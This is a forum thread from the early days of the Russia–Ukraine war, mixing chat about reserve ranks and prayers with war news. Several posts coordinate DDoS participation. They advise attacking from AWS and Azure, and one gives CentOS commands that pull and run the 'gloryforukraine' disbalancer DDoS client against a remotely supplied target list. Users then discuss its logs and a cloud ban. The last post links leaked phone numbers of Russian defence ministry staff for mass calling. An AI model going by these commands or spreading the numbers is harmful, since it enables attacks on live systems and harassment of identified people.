Гудзак

Хатуль мелумад - тварина типу кіт, що йде ланцюгом
Реєстрація
29.01.14
Місто
Першотравенськ (Січеславщина)
Телефон
Moto G9+; Moto G5+
Бурун, я офицер запаса. У меня зеленый военник. Военная кафедра + 3 месяца сборов после дипломирования в полку с госэкзаменом. Ну, и через 4 года - 10 дней командирской учебы.
 

Бурун

Заблокирован
Реєстрація
22.03.15
Місто
Рівне
Бурун, я офицер запаса. У меня зеленый военник. Военная кафедра + 3 месяца сборов после дипломирования в полку с госэкзаменом. Ну, и через 4 года - 10 дней командирской учебы.
Тоесть сейчас ещё поручиком числитесь или капитана присвоили?
 

Гудзак

Хатуль мелумад - тварина типу кіт, що йде ланцюгом
Реєстрація
29.01.14
Місто
Першотравенськ (Січеславщина)
Телефон
Moto G9+; Moto G5+
Бурун, последнее звание по военнику - старлей (с 86го; первичное офицерское в 81м - лейтенант). За новое не знаю. Меня все равно надо доучивать/переучивать.
 

Бурун

Заблокирован
Реєстрація
22.03.15
Місто
Рівне
Бурун, последнее звание по военнику - старлей (с 86го; первичное офицерское в 81м - лейтенант). За новое не знаю. Меня все равно надо доучивать/переучивать.
Значит поручик.
Если верите, возьмите поясочек с 90 псалмом или иконочку, а так каждый день читайте 26 псалом.
Счастливого возвращения на гражданку.
Думаю эта маячня закончится в следующую среду, а если нет то затянется на года.
 
Реєстрація
29.03.18
Місто
🟦🟨
Телефон
Піксель
Я раджу діяти в хмарах: AWS та Azure. Цілі та інструкції шукайте на Дискорд-каналах.
 
Останнє редагування:

Паук

Пивовар
Команда форуму
Реєстрація
27.10.07
Місто
Полтава
Телефон
(M) forever
Комусь вдалось uashield зібрати з сорсів на чистому лінуксі (без іксів) ?
 

Паук

Пивовар
Команда форуму
Реєстрація
27.10.07
Місто
Полтава
Телефон
(M) forever
knedlyk воно таке як "віконне"
і там вже є збірка під лінукс

От ще одна "інструкція"

Для centos достатньо screen та docker
Код:
yum install -y epel-release
yum install -y screen docker
screen
docker pull archdev/gloryforukraine:latest && docker run --env SCHEDULED_TARGETS_URL=https://gloryforukraine.pages.dev/scheduled_targets.json --env PARALLEL_FACTOR=5 --cpus=".7" --rm -it archdev/gloryforukraine:latest ./launcher-disbalancer-go-client-linux-amd64
 
Реєстрація
29.03.18
Місто
🟦🟨
Телефон
Піксель
knedlyk воно таке як "віконне"
і там вже є збірка під лінукс

От ще одна "інструкція"

Для centos достатньо screen та docker
Код:
yum install -y epel-release
yum install -y screen docker
screen
docker pull archdev/gloryforukraine:latest && docker run --env SCHEDULED_TARGETS_URL=https://gloryforukraine.pages.dev/scheduled_targets.json --env PARALLEL_FACTOR=5 --cpus=".7" --rm -it archdev/gloryforukraine:latest ./launcher-disbalancer-go-client-linux-amd64
Без докера на aws не захотів розгортатися... Скажіть, для чого screen?
А також поясніть, що означає інфа в лоґах, зокрема:
1646604927939.png
 
Останнє редагування:

Паук

Пивовар
Команда форуму
Реєстрація
27.10.07
Місто
Полтава
Телефон
(M) forever
Для того, щоб софт був запущений, коли закриваєш термінал
GNU screen — повноекранний консольний віконний менеджер, що дозволяє використовувати один фізичний термінал для роботи з декількома застосунками, яким виділяються окремі віртуальні термінали, що залишаються активними між різними сеансами зв'язку користувача.

В логах невдалі спроби підключення на іпак:порт. За докер я казав :)
 
Реєстрація
29.03.18
Місто
🟦🟨
Телефон
Піксель
Для того, щоб софт був запущений, коли закриваєш термінал
GNU screen — повноекранний консольний віконний менеджер, що дозволяє використовувати один фізичний термінал для роботи з декількома застосунками, яким виділяються окремі віртуальні термінали, що залишаються активними між різними сеансами зв'язку користувача.

В логах невдалі спроби підключення на іпак:порт. За докер я казав :)
Чекайте, що за докер казали?.. невдалі спроби - це ознака, що на тій стороні захист спрацьовує?

Азюр забанив...
 

AngryDen

Перфекціоніст
Реєстрація
23.12.14
Місто
Дніпро - Запоріжжя
Телефон
Xiaomi
 

Гудзак

Хатуль мелумад - тварина типу кіт, що йде ланцюгом
Реєстрація
29.01.14
Місто
Першотравенськ (Січеславщина)
Телефон
Moto G9+; Moto G5+
...эх, сглазил меня кто-то... Бюрократия непобедима...

...так что у кого чешутся руки - учтите мой опыт, не попадите в бюрократическую ловушку. Просчитайте все нюансы. А я - пока - снова в "диванные войска"... 8-(
 

Гудзак

Хатуль мелумад - тварина типу кіт, що йде ланцюгом
Реєстрація
29.01.14
Місто
Першотравенськ (Січеславщина)
Телефон
Moto G9+; Moto G5+
А за все ваши лайки под моим постом 3 назад - огромное вам всем спасибо. Расчувствовался донельзя. И сил прибавилось немеряно. Всё будет Украина!
 
Реєстрація
27.05.21
Місто
Киев
⚡️Мэр Ирпеня Александр Маркушин заявил о получении угроз от россиян в свой адрес. Сообщениями он поделился на своей странице в Фейсбук. ⚡️Мэру Белой Церкви поступило предложение от россиян перейти на их сторону.

Однако Геннадий Дикий отреагировал однозначно и послал их по направлению русского военного корабля.
 

Вкладення

  • IMG-df4a9f8f1480358d46889a5960bbebe3-V.jpg
    IMG-df4a9f8f1480358d46889a5960bbebe3-V.jpg
    155.4 КБ · Перегляди: 49
  • IMG-9d765b93dd29317197b99d7688d89a29-V.jpg
    IMG-9d765b93dd29317197b99d7688d89a29-V.jpg
    128.9 КБ · Перегляди: 38
Останнє редагування:
Реєстрація
27.05.21
Місто
Киев
https://ru.files.fm/f/kcpj3g8wf В сеть слили телефоны Российских окупантов. Львовская ОГА призвала местных жителей устроить "веселую ночь" работникам Министерства обороны России. Для этого нужно звонить на номера, которые обнародовали хакеры из Anonymous, и рассказывать о потерях россиян на фронте. https://novyny.live/ru/lviv/khakery-vzlomali-sait-minoborony-rf-i-slili-nomera-telefonov-41057.html
 
Останнє редагування:
Зверху